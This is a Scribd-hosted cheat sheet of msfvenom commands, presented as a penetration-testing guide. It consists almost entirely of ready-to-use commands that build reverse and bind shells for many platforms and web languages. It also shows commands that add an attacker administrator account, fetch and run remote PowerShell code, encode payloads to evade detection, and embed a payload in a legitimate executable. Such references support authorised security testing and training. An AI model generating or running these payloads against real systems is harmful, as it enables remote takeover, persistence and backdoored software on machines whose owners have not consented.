0% found this document useful (0 votes)
518 views4 pages

MSFVenom Payloads and Usage Guide

msfvenom can generate various payloads and encode them for use in penetration testing. It supports generating payloads for Windows, Linux, Mac, and web-based platforms. Common parameters include specifying the payload, encoder, format, and host/port. Payloads like reverse shells and bind shells can be generated for meterpreter, shell, and other payload types. Encoding, embedding in files, and generating scripting payloads are also supported options in msfvenom.

Uploaded by

ojanathotto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
518 views4 pages

MSFVenom Payloads and Usage Guide

msfvenom can generate various payloads and encode them for use in penetration testing. It supports generating payloads for Windows, Linux, Mac, and web-based platforms. Common parameters include specifying the payload, encoder, format, and host/port. Payloads like reverse shells and bind shells can be generated for meterpreter, shell, and other payload types. Encoding, embedding in files, and generating scripting payloads are also supported options in msfvenom.

Uploaded by

ojanathotto
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

$ msfvenom usecase

Basic msfvenom
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
One can also use the -a to specify the architecture or the --platform

Listing
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders

Common params when creating a shellcode

-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID

Windows
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe >
[Link]

Bind Shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe >
[Link]

Create User
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > [Link]

CMD Shell
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe >
[Link]
Execute Command
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object
[Link]).downloadString('[Link] -f exe > [Link]
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators
shaun /add" -f exe > [Link]

Encoder
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > [Link]

Embedded inside executable


msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x
/usr/share/windows-binaries/[Link] -f exe -o [Link]

Linux Payloads
Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf >
[Link]
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > [Link]

Bind Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf >
[Link]

SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP)
LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > [Link]

MAC Payloads
Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho >
[Link]

Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho >
[Link]

Web Based Payloads


PHP

Reverse shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > [Link]
cat [Link] | pbcopy && echo '<?php ' | tr -d '\n' > [Link] && pbpaste >> [Link]

ASP/x

Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp
>[Link]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx
>[Link]

JSP

Reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw>
[Link]

WAR

Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war >
[Link]

NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)

Script Language payloads


Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > [Link]

Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw >
[Link]

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw >
[Link]

You might also like